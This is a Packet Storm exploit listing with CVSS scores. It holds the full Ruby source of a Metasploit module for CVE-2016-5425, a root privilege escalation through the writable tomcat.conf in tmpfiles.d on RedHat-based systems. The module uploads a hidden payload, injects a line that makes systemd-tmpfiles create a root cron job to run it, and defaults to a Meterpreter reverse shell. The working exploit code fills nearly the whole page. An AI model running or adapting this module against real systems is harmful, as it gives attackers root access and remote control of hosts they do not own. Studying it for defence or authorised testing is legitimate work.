Lucene search

K
packetstormH00die, Dawid Golunski, metasploit.comPACKETSTORM:171337
HistoryMar 14, 2023 - 12:00 a.m.

Apache Tomcat Privilege Escalation

2023-03-1400:00:00
h00die, Dawid Golunski, metasploit.com
packetstormsecurity.com
250

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.001 Low

EPSS

Percentile

47.9%

`###  
#  
# This exploit sample shows how an exploit module could be written to exploit  
# a bug in a command on a linux computer for priv esc.  
#  
###  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ManualRanking  
  
include Msf::Exploit::Retry  
include Msf::Post::Linux::Priv  
include Msf::Post::Linux::System  
include Msf::Post::File  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
include Msf::Post::Linux::Compile  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation',  
'Description' => %q{  
This module exploits a vulnerability in RedHat based systems where  
improper file permissions are applied to /usr/lib/tmpfiles.d/tomcat.conf  
for Apache Tomcat versions before 7.0.54-8. This may also work against  
  
The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage  
temporary files including their creation.  
  
With this weak permission, we're able to inject commands into systemd-tmpfiles  
service to write a cron job to execute our payload.  
  
systemd-tmpfiles is executed by default on boot on RedHat-based systems  
through systemd-tmpfiles-setup.service. Depending on the system in use,  
the execution of systemd-tmpfiles could also be triggered by other  
services, cronjobs, startup scripts etc.  
  
This module was tested against Tomcat 7.0.54-3 on Fedora 21.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die', # msf module  
'Dawid Golunski <[email protected]>' # original PoC, analysis, discovery  
],  
'Platform' => [ 'linux' ],  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'SessionTypes' => [ 'shell', 'meterpreter' ],  
'Targets' => [[ 'Auto', {} ]],  
'Privileged' => true,  
'DefaultOptions' => {  
'WfsDelay' => 1800, # 30min  
'payload' => 'linux/x64/meterpreter_reverse_tcp'  
},  
'References' => [  
['EDB', '40488' ],  
['URL', 'https://access.redhat.com/security/cve/CVE-2016-5425'],  
['URL', 'http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html'],  
['URL', 'https://www.freedesktop.org/software/systemd/man/tmpfiles.d.html'], # general tompfiles.d info  
['CVE', '2016-5425']  
],  
'DisclosureDate' => '2016-10-10',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]  
}  
)  
)  
register_advanced_options [  
OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]),  
]  
end  
  
# Simplify pulling the writable directory variable  
def base_dir  
datastore['WritableDir'].to_s  
end  
  
def tomcat_conf  
'/usr/lib/tmpfiles.d/tomcat.conf'  
end  
  
def suid?(file)  
get_suid_files(file).include? file  
end  
  
def check  
package = cmd_exec('rpm -qa | grep "^tomcat\-[678]"')  
if package.nil? || package.empty?  
return CheckCode::Safe('Unable to execute command to determine installed pacakges')  
end  
  
package = package.sub('tomcat-', '').strip  
# fedora based cleanup  
package = package.sub(/\.fc\d\d\.noarch/, '')  
# rhel/centos based cleanup  
package = package.sub(/\.el\d_\d\.noarch/, '')  
package = Rex::Version.new(package)  
  
# The write-up says 6, 7, 8 but doesn't include version numbers. RHEL's writeup says  
# only 7 is effected, so we're going to go off their write-up.  
if package.to_s.start_with?('7') && package < Rex::Version.new('7.0.54-8')  
return CheckCode::Appears("Vulnerable app version detected: #{package}")  
end  
  
CheckCode::Safe("Unexploitable tomcat packages found: #{package}")  
end  
  
def exploit  
# Check if we're already root  
if is_root? && !datastore['ForceExploit']  
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'  
end  
  
unless writable? base_dir  
fail_with Failure::BadConfig, "#{base_dir} is not writable"  
end  
  
unless writable? tomcat_conf  
fail_with Failure::BadConfig, "#{tomcat_conf} is not writable"  
end  
  
vprint_status("Creating backup of #{tomcat_conf}")  
@tomcat_conf_content = read_file(tomcat_conf)  
path = store_loot(  
tomcat_conf,  
'text/plain',  
rhost,  
@tomcat_conf_content,  
'tomcat.conf'  
)  
print_good("Original #{tomcat_conf} backed up to #{path}")  
  
# Upload payload executable  
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"  
vprint_status("Uploading Payload to #{payload_path}")  
upload_and_chmodx payload_path, generate_payload_exe  
register_file_for_cleanup(payload_path)  
  
# write in our payload execution  
vprint_status("Writing permission elevation into #{tomcat_conf}")  
  
cron_job = "/etc/cron.d/#{rand_text_alphanumeric(5..10)}"  
print_status("Creating cron job in #{cron_job}")  
# The POC shows 2 options, a cron answer, and copy bash answer.  
# Initially I attempted to copy our payload, set suid and root owner  
# however it seemed to need 2 service restart to apply all the permissions.  
# I never figured out why it was like that, even chaining copying bash in, then  
# launching the payload from the bash instance etc. We opt for the cron  
# which may take 1 additional minute, and rely on cron, but is much more stable  
cmd_exec("echo 'F #{cron_job} 0644 root root - \"* * * * * root nohup #{payload_path} & \\n\\n\"' >> #{tomcat_conf}")  
register_file_for_cleanup(cron_job)  
  
# we now need systemd-tmpfiles to restart  
print_good("Waiting #{datastore['WfsDelay']} seconds. Run the following command on the target machine: /usr/bin/systemd-tmpfiles --create - this is required to restart the tmpfiles-setup.service")  
succeeded = retry_until_truthy(timeout: datastore['WfsDelay']) do  
file? cron_job  
end  
  
unless succeeded  
print_error("#{cron_job} not found, exploit aborted")  
return  
end  
  
print_status('Waiting on cron to execute the payload (~1 minute)')  
end  
  
def cleanup  
unless @tomcat_conf_content.nil?  
write_file(tomcat_conf, @tomcat_conf_content)  
end  
super  
end  
end  
`

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.001 Low

EPSS

Percentile

47.9%